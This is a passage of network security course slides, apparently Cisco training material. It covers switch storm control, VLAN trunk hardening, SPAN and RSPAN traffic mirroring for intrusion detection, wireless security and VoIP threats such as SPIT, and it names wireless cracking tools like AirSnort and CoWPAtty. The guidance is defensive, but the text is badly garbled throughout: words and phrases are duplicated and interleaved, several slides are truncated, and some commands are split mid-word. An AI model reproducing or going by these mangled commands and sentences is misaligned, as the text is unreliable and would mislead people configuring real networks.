• bps bps : Rising suppression level. The range is 0.0 to : Rising suppression level. The range is 0.0 to 10000000000.0. Block the10000000000.0. Block the flooding of storm packets when the value specified for bps is reached. flooding of storm packets when the value specified for bps is reached. •

• bps-low bps-low : (Optional) Falling suppression level, up to one decimal place. This value: (Optional) Falling suppression level, up to one decimal place. This value must be equal to or less than

must be equal to or less than the rising suppression value.the rising suppression value.

level pps

level pps pps pps [[ pps-low pps-low ]] Specify the rising and falling suppression levels Specify the rising and falling suppression levels as a rate in packets per second atas a rate in packets per second at which traffic is received on the port.

which traffic is received on the port. •

• pps: pps: Rising suppression level. The range is 0.0 to Rising suppression level. The range is 0.0 to 10000000000.0. Block the10000000000.0. Block the flooding of storm packets when the value specified for pps is reached. flooding of storm packets when the value specified for pps is reached. •

• pps-low pps-low : (Optional) F: (Optional) Falling suppression level, up alling suppression level, up to one decimal place. to one decimal place. This valueThis value must be equal to or less than

must be equal to or less than the rising suppression value.the rising suppression value.

action

action {{shutdownshutdown||traptrap}} The action taken when a storm occurs on a port. The default action is The action taken when a storm occurs on a port. The default action is to filter trafficto filter traffic and to not send an SNMP trap.

and to not send an SNMP trap. The keywords have these meanings: The keywords have these meanings: •

• shutdown:shutdown: Disables the port during a stormDisables the port during a storm •

(57)

Verify Storm Control Settings

Switch#

Switch# show storm-controlshow storm-control

Interface

Interface Filter Filter State State Upper Upper Lower Lower CurrentCurrent

--- --- --- --- --- --Gi0/1

-Gi0/1 Forwarding Forwarding 20 20 pps pps 10 10 pps pps 5 5 ppspps Gi0/2

Gi0/2 Forwarding Forwarding 50.00% 50.00% 40.00% 40.00% 0.00%0.00% <output omitted>

(58)

Trunk Trunk

(Native VLAN = 10) (Native VLAN = 10)

1.

1. DiDisasablble te trurunknkining og on an all ll accaccesesss ports.

ports. 2.

2. DiDisasablble aue auto tto trurunknkining ang and mad manunualallyly enable trunking

enable trunking 3.

3. Be Be susure re ththat at ththe ne natative ive VLVLAN AN isis used only for trunk lines and no used only for trunk lines and no where else

where else

Mitigating VLAN Attacks

(59)

switchport mode trunk switchport mode trunk

switchport trunk native vlan

switchport trunk native vlan vlan_number vlan_number

switchport nonegotiate switchport nonegotiate .. Switch(config-if)# Switch(config-if)#

•

• Specifies an interface as a trunk link

Specifies an interface as a trunk link

•

• Prevents the generation of DTP frames.

Prevents the generation of DTP frames.

•

• Set the native VLAN on the trunk

Set the native VLAN on the trunk to an unused VLAN

to an unused VLAN

Controlling Trunking

(60)

Traffic Analysis



 A SP A SPAN port mirrors traffic toAN port mirrors traffic to

another port where a another port where a monitoring device is monitoring device is connected.

connected.



 Without this, it can be difficultWithout this, it can be difficult

to track hackers after they

have entered the network.

“Intruder “Intruder Alert!” Alert!” Attacker Attacker IDS IDS RMON Probe RMON Probe Protocol Analyzer Protocol Analyzer

(61)

CLI Commands

monitor session

monitor session session_number session_number sourcesource {{interfaceinterface interface-id

interface-id [[,, || --] [] [ both both || rxrx || txtx]} | {]} | {vlanvlan vlanvlan-id

id [, | -] [[, | -] [ both both || rxrx || txtx]}| {]}| {remote vlanremote vlan vlan-id vlan-id }}

monitor session

monitor session session_number session_number destinationdestination {

{interfaceinterface interface-id interface-id [[,, || --] [] [encapsulationencapsulation replicate

replicate] [] [ingressingress {{dot1q vlandot1q vlan vlan-id vlan-id || islisl || untagged vlan

untagged vlan vlan-id vlan-id || vlanvlan vlan-id vlan-id }]} | {}]} | {remoteremote vlan

vlan vlan-id vlan-id }} Switch(config)# Switch(config)#

Switch(config)# Switch(config)#

(62)

Verify SPAN Configurat

(63)

SPAN and IDS

Attacker Attacker IDS IDS Use SPAN to Use SPAN to mirror traffic in mirror traffic in and out of port and out of port F0/1 to port F0/1 to port F0/2. F0/2. F0/1 F0/1 F0/2 F0/2

(64)

Overview of RSPAN

•

• An RSP An RSPAN port mirrors trafficAN port mirrors traffic to another port on another to another port on another switch where a probe or IDS switch where a probe or IDS sensor is connected.

sensor is connected. •

• This allows more switches toThis allows more switches to be monitored with a single be monitored with a single probe or IDS. probe or IDS. “Intruder “Intruder Alert!” Alert!” Attacker Attacker IDS IDS RSPAN VLAN RSPAN VLAN Source VLAN Source VLAN Source VLAN Source VLAN Source VLAN Source VLAN

(65)

Configuring RSPAN

2

2996600--11 22996600--22

2960-1(config)#

2960-1(config)# vlan 100vlan 100

2960-1(config-vlan)#

2960-1(config-vlan)# remote-spanremote-span

2960-1(config-vlan)#

2960-1(config-vlan)# exitexit

2960-1(config)#

2960-1(config)# monitor session monitor session 1 source interf1 source interface FastEthernet ace FastEthernet 0/10/1

2960-1(config)#

2960-1(config)# monitor session monitor session 1 destination r1 destination remote vlan 100emote vlan 100 reflector-port FastEthernet 0/24

reflector-port FastEthernet 0/24

2960-1(config)#

2960-1(config)# interface FastEthernet 0/2interface FastEthernet 0/2

2960-1(config-if)#

2960-1(config-if)# switchport mode trunkswitchport mode trunk

2960-2(config)#

2960-2(config)# monitor session monitor session 2 source remote 2 source remote vlan 100vlan 100

2960-2(config)#

2960-2(config)# monitor session monitor session 2 destination in2 destination interface FastEtherterface FastEthernet 0/3net 0/3

2960-2(config)#

2960-2(config)# interface FastEthernet 0/2interface FastEthernet 0/2

2960-2(config-if)#

2960-2(config-if)# switchport mode trunkswitchport mode trunk

1. Configure the RPSAN VLAN 1. Configure the RPSAN VLAN

2. Configure t

2. Configure the RSPhe RSPAN source AN source ports and VLANsports and VLANs

3. Configure the

(66)

Verifying RSPAN Configura

tion

show monitor

show monitor [[sessionsession {{session_number session_number || allall || locallocal | r

| rangeange listlist || remoteremote} [} [detaildetail]] []] [ || {{ begin begin || excludeexclude |

| includeinclude}}expressionexpression]] 2

(67)

Layer 2 Guidelines

•

• Manage switches in as secure a

Manage switches in as secure a manner as possible

manner as possible

(SSH, out-of-band

(SSH, out-of-band management,

management, ACLs,

ACLs, etc.)

etc.)

•

• Set all user ports to

Set all user ports to non-trunking mode (except if using

non-trunking mode (except if using

Cisco

Cisco V

VoIP)

oIP)

•

• Use port security where possible for access ports

Use port security where possible for access ports

•

• Enable STP attack mitigation (BPDU guard, root guard)

Enable STP attack mitigation (BPDU guard, root guard)

•

• Use Cisco Discovery Protocol only where necessary –

Use Cisco Discovery Protocol only where necessary –

with phones it is useful

•

• Configure PortFast on all non-trunking ports

Configure PortFast on all non-trunking ports

•

• Configure root guard on STP root ports

Configure root guard on STP root ports

•

(68)

VLAN Practices

•

• Always use a dedicate

Always use a dedicated, unused nati

d, unused native VLAN ID for

ve VLAN ID for

trunk ports

•

• Do not use VLAN 1 for anything

Do not use VLAN 1 for anything

•

• Disable all unused ports and put them in an unused

Disable all unused ports and put them in an unused

VLAN

•

• Manually configure all trunk ports

Manually configure all trunk ports and disable DTP on

and disable DTP on

trunk ports

•

• Configure all non-trunking ports with

Configure all non-trunking ports with

switchport mode

access

(69)

Overview of Wireless, VoIP Security

Wireless

(70)

Overview of SAN Security

SAN SAN

(71)

Infrastructure-Integrated Approach

•

• Proactive threat and intrusionProactive threat and intrusion detection capabilities that do detection capabilities that do not simply detect wireless not simply detect wireless attacks but prevent them attacks but prevent them •

• Comprehensive protection toComprehensive protection to safeguard confidential data and safeguard confidential data and communications

communications •

• Simplified user managementSimplified user management with a single user identity and with a single user identity and policy

policy •

• Collaboration with wiredCollaboration with wired security systems

(72)

Cisco IP Telephony Solutions

•

• Single-site deployment

Single-site deployment

•

• Centralized call

Centralized call

processing with remote

branches

•

• Distributed call-

Distributed

call-processing deployment

processing deployment

•

• Clustering over the

Clustering over the

IPWAN

(73)

Storage Network Solutions

•

• Investment

Investment

protection

•

• Virtualization

Virtualization

•

• Security

Security

•

• Consolidation

Consolidation

•

• Availability

Availability

(74)

Cisco Wireless LAN Controllers

•

• Responsible for system-wide wireless LANResponsible for system-wide wireless LAN functions

functions •

• Work in conjunction with Aps and the CiscoWork in conjunction with Aps and the Cisco Wireless Control System (WCS) to support Wireless Control System (WCS) to support wireless applications

wireless applications •

• Smoothly integrate into existing enterpriseSmoothly integrate into existing enterprise networks

(75)

Wireless Hacking

•

• War driving

War driving

•

• A neighbor hacks i

A neighbor hacks into

nto

another neighbor’s

wireless network to get

free Internet access or

access information

•

• Free Wi-Fi provides an

Free Wi-Fi provides an

opportunity to

compromise the data of

users

(76)

Hacking Tools

•

• Network Stumbler

Network Stumbler

•

• Kismet

Kismet

•

• AirSnort

AirSnort

•

• CoWPAtty

CoWPAtty

•

• ASLEAP

ASLEAP

•

• Wireshark

Wireshark

(77)

Safety Considerations

•

• Wireless networks using WEP or WPA/TKIP are

Wireless networks using WEP or WPA/TKIP are

not very secure and vulnerable to hacking

attacks.

•

• Wireless networks using WPA2/AES should

Wireless networks using WPA2/AES should

have a passphrase of at least 21 characters

long.

•

• If an IPsec VPN is available, use it

If an IPsec VPN is available, use it on any public

on any public

wireless LAN.

•

• If wireless access is not needed, disable the

If wireless access is not needed, disable the

wireless radio or wireless NIC.

(78)

VoIP Business Advantages

•

• Lower telecom call costs

Lower telecom call costs

•

• Productivity increases

Productivity increases

•

• Lower costs to move, add,

Lower costs to move, add,

or change

•

• Lower ongoing service

Lower ongoing service

and maintenance costs

•

• Little or no training costs

Little or no training costs

•

• Mo major set-up fees

Mo major set-up fees

•

• Enables unified

Enables unified

messaging

•

• Encryption of voice calls is

Encryption of voice calls is

supported

•

• Fewer administrative

Fewer administrative

personnel required

PSTN PSTN VoIPVoIP Gateway Gateway

(79)

VoIP Components

Cisco Unified Cisco Unified Communications Communications Manager Manager (Call Agent) (Call Agent) MCU MCU Cisco Cisco Unity Unity IP IP Phone Phone IP IP Phone Phone Videoconference Videoconference Station Station IP IP Backbone Backbone PSTN PSTN Router/ Router/ Gateway Gateway Router/ Router/ Gateway Gateway Router/ Router/ Gateway Gateway

(80)

VoIP Protocols

V

VooIIP P PPrroottooccooll DDeessccrriippttiioonn

H.323

H.323 ITU standard protocol for interactive conferencing; evolved from H.320ITU standard protocol for interactive conferencing; evolved from H.320 ISDN standard; flexible, complex

ISDN standard; flexible, complex MGCP

MGCP Emerging IETF standard for PSTN gateway control; thin device controlEmerging IETF standard for PSTN gateway control; thin device control

Megaco/H.248

Megaco/H.248 Joint IETF and ITU standard for gateway control with support for multipleJoint IETF and ITU standard for gateway control with support for multiple_{gateway types; evolved from MGCP standard}_{gateway types; evolved from MGCP standard}

SIP

SIP IETF protocol IETF protocol for interactive anfor interactive and nonind noninteractiveteractive conferencingconferencing; simpler b; simpler butut less mature than H.323

less mature than H.323

RTP

RTP ETF standard media-streaming protocolETF standard media-streaming protocol

RTCP

RTCP IETF protocol that IETF protocol that provides out-of-band control information for an RTP flowprovides out-of-band control information for an RTP flow

SRTP

SRTP IETF protocol that encrypts RTP traffic as it leaves theIETF protocol that encrypts RTP traffic as it leaves the voice device

voice device

SCCP

SCCP Cisco proprietary protocol used between Cisco Unified CommunicationsCisco proprietary protocol used between Cisco Unified Communications Manager and Cisco IP phones

(81)

Threats

•

• Reconnaissance

Reconnaissance

•

• Directed attacks such as spam over

Directed attacks such as spam over IP telephony

IP telephony

(SPIT) and spoofing

•

• DoS attacks such as DHCP

DoS attacks such as DHCP starvation, flooding, and

starvation, flooding, and

fuzzing

•

(82)

VoIP SPIT

•

• If SPIT grows like spam, it could result inIf SPIT grows like spam, it could result in regular DoS problems for network

regular DoS problems for network administrators.

administrators. •

• Antispam methods do not block SPIT. Antispam methods do not block SPIT. •

• Authenticated TLS stops most SPIT attacks Authenticated TLS stops most SPIT attacks because TLS endpoints accept packets

because TLS endpoints accept packets only from trusted devices.

only from trusted devices.

Y

You’ve ou’ve justjust won an all won an all expenses expenses paid vacation paid vacation to the U.S. to the U.S. Virgin Islands Virgin Islands !!! !!!